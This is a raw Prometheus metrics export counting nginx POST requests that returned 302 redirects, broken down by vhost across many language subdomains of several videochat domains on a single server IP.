nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ca.videochat.world"} 132 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ceb.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ceb.videochat.mx"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ceb.videochat.show"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ceb.videochat.tv.br"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ceb.videochat.world"} 285 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="chm.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="chm.videochat.tv.br"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="chm.videochat.world"} 225 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ckdbbet.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cs.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cs.videochat.date"} 162 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cs.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cs.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cs.videochat.tv.br"} 102 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cs.videochat.world"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cy.videochat.cafe"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cy.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cy.videochat.mx"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cy.videochat.show"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cy.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cy.videochat.world"} 236 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="cytjruk.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="czhdzka.videochat.mx"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="da.videochat.cafe"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="da.videochat.date"} 91 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="da.videochat.mx"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="da.videochat.show"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="da.videochat.tv.br"} 253 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="da.videochat.world"} 175 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ddb00497-7d32-400e-85c8-bc34712fde6d.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="de.videochat.cafe"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="de.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="de.videochat.show"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="de.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="de.videochat.world"} 632 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="dwpqqsi.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ee.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ee.videochat.date"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ee.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ee.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ee.videochat.tv.br"} 191 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="el.videochat.mx"} 654 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="el.videochat.tv.br"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="el.videochat.world"} 69 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="en.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="en.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="en.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="en.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="eo.videochat.cafe"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="eo.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="eo.videochat.mx"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="eo.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="eo.videochat.tv.br"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="eo.videochat.world"} 248 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="es.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="es.videochat.date"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="es.videochat.tv.br"} 110 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="es.videochat.world"} 136 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="et.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="et.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="et.videochat.show"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="et.videochat.tv.br"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="et.videochat.world"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="eu.videochat.cafe"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="eu.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="eu.videochat.show"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="eu.videochat.tv.br"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="eu.videochat.world"} 551 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fa.videochat.mx"} 136 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fa.videochat.tv.br"} 340 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fa.videochat.world"} 220 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fi.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fi.videochat.date"} 174 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fi.videochat.mx"} 127 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fi.videochat.show"} 152 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fi.videochat.tv.br"} 185 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fi.videochat.world"} 199 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fr.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fr.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fr.videochat.tv.br"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="fr.videochat.world"} 142 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ga.videochat.cafe"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ga.videochat.mx"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ga.videochat.show"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ga.videochat.tv.br"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ga.videochat.world"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="gl.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="gl.videochat.mx"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="gl.videochat.tv.br"} 240 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="gl.videochat.world"} 214 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="gu.videochat.cafe"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="gu.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="gu.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="gu.videochat.world"} 227 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="he.videochat.cafe"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="he.videochat.date"} 89 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="he.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="he.videochat.show"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="he.videochat.tv.br"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="he.videochat.world"} 183 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hi.videochat.cafe"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hi.videochat.date"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hi.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hi.videochat.show"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hi.videochat.tv.br"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hi.videochat.world"} 163 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hr.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hr.videochat.date"} 153 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hr.videochat.mx"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hr.videochat.show"} 131 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hr.videochat.tv.br"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hr.videochat.world"} 180 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ht.videochat.cafe"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ht.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ht.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ht.videochat.tv.br"} 126 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ht.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hu.videochat.cafe"} 173 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hu.videochat.date"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hu.videochat.mx"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hu.videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="hu.videochat.world"} 376 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="id.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="id.videochat.mx"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="id.videochat.show"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="id.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="id.videochat.world"} 249 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="is.videochat.cafe"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="is.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="is.videochat.show"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="is.videochat.tv.br"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="is.videochat.world"} 221 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="it.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="it.videochat.date"} 128 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="it.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="it.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="it.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="it.videochat.world"} 132 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="jaiyuba.videochat.mx"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="jp.videochat.cafe"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="jp.videochat.date"} 111 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="jp.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="jp.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="jp.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="jp.videochat.world"} 138 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="jv.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="jv.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="jv.videochat.show"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="jv.videochat.tv.br"} 174 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="jv.videochat.world"} 97 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ka.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ka.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ka.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ka.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ka.videochat.world"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="kbmjvka.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="kctjjudm.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="kjjlaro.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="kk.videochat.cafe"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="kk.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="kk.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="kk.videochat.world"} 543 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="km.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="km.videochat.mx"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="km.videochat.tv.br"} 135 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="km.videochat.world"} 159 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="kn.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="kn.videochat.mx"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="kn.videochat.tv.br"} 87 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="kn.videochat.world"} 199 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ko.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ko.videochat.date"} 164 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ko.videochat.mx"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ko.videochat.show"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ko.videochat.tv.br"} 114 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ko.videochat.world"} 588 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ky.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ky.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ky.videochat.show"} 142 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ky.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ky.videochat.world"} 78 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lb.videochat.cafe"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lb.videochat.mx"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lb.videochat.show"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lb.videochat.tv.br"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lb.videochat.world"} 235 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lo.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lo.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lo.videochat.tv.br"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lo.videochat.world"} 107 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="localhost"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lt.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lt.videochat.date"} 271 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lt.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lt.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lt.videochat.tv.br"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lt.videochat.world"} 399 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lv.videochat.cafe"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lv.videochat.date"} 149 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lv.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lv.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lv.videochat.tv.br"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="lv.videochat.world"} 201 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mail.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mg.videochat.cafe"} 90 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mg.videochat.date"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mg.videochat.mx"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mg.videochat.show"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mg.videochat.tv.br"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mg.videochat.world"} 155 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mi.videochat.cafe"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mi.videochat.date"} 73 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mi.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mi.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mi.videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mi.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mk.videochat.date"} 178 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mk.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mk.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mk.videochat.world"} 67 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ml.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ml.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ml.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ml.videochat.world"} 173 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mn.videochat.cafe"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mn.videochat.date"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mn.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mn.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mn.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mr.videochat.cafe"} 72 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mr.videochat.show"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mr.videochat.tv.br"} 123 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mr.videochat.world"} 94 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mrj.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mrj.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mrj.videochat.mx"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mrj.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mrj.videochat.tv.br"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mrj.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ms.videochat.cafe"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ms.videochat.date"} 40 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ms.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ms.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ms.videochat.world"} 126 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mt.videochat.cafe"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mt.videochat.mx"} 144 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mt.videochat.tv.br"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="mt.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="my.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="my.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="my.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="my.videochat.world"} 205 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ne.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ne.videochat.date"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ne.videochat.mx"} 83 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ne.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ne.videochat.tv.br"} 95 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="ne.videochat.world"} 293 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="nl.videochat.cafe"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="nl.videochat.mx"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="nl.videochat.tv.br"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="nl.videochat.world"} 147 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="no.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="no.videochat.date"} 398 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="no.videochat.mx"} 457 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="no.videochat.tv.br"} 87 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="no.videochat.world"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pa.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pa.videochat.mx"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pa.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pa.videochat.world"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pap.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pap.videochat.date"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pap.videochat.mx"} 76 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pap.videochat.show"} 48 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pap.videochat.tv.br"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pap.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pkiaram.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pl.videochat.cafe"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pl.videochat.date"} 158 nginx_http_response_count_total{app="web",host="161.97.120.25",method="POST",status="302",vhost="pl.videochat.mx"} 14 